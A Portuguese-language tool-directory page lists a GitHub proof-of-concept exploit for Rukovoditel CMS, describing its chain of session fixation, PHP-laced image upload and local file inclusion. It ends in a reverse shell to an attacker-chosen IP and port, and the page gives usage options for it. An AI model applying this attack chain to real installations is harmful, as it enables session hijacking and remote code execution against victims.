Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-RCE-Rukovoditel — Prova de conceito para CVE-2020-11819 e CVE-2020-15946 | Kitploit
Ferramentas/GitHubGitHub/danyx07/poc-rce-rukovoditel
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

Prova de conceito para CVE-2020-11819 e CVE-2020-15946

Ver Repositório
há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC-RCE-Rukovoditel

Prova de conceito para CVE-2020-11819 e CVE-2020-15946. Testado no Rukovoditel 2.4.x, 2.5.x e 2.6.1

Descrição:

Este exploit possui dois modos de execução, utilizando a vulnerabilidade de fixação de sessão (CVE-2020-15946) ou usando as credenciais de acesso de qualquer conta em qualquer perfil. Com a opção --type L, este script criará um link malicioso. Se o link for acessado em um navegador pela vítima, um identificador de sessão arbitrário será definido, que será usado para roubar sua sessão após o upload de uma imagem com conteúdo PHP no perfil de foto, e então usar inclusão de arquivo local (CVE-2020-11819) para obter um shell reverso; ou, com as opções --type C -u <usuário> -p , você pode fornecer credenciais, carregar a imagem com conteúdo PHP e usar inclusão de arquivo local (CVE-2020-11819) para alcançar a execução de código.

Dica: lembre-se de verificar se o módulo de registro está ativado ;)

Uso

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

RCE pós-autenticação para rukovoditel, versão do script 1.0

argumentos opcionais:
-h, --help exibe esta mensagem de ajuda e sai
-t URL, --target URL URL/caminho completo para o CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Nome de usuário para autenticação
-p PASSWORD, --password PASSWORD Senha para autenticação
-a TYPE, --type TYPE Use -a L para gerar o link e roubar a sessão, ou use -a C se você tiver credenciais de acesso ao aplicativo web
--ip IP_ATTACKER IP do atacante para shell reverso!
--port PORT_ATTACKER Porta para conexão do shell reverso
--proxy PROXY Configurar proxy http para depuração http://127.0.0.1:8080

Baixar ferramenta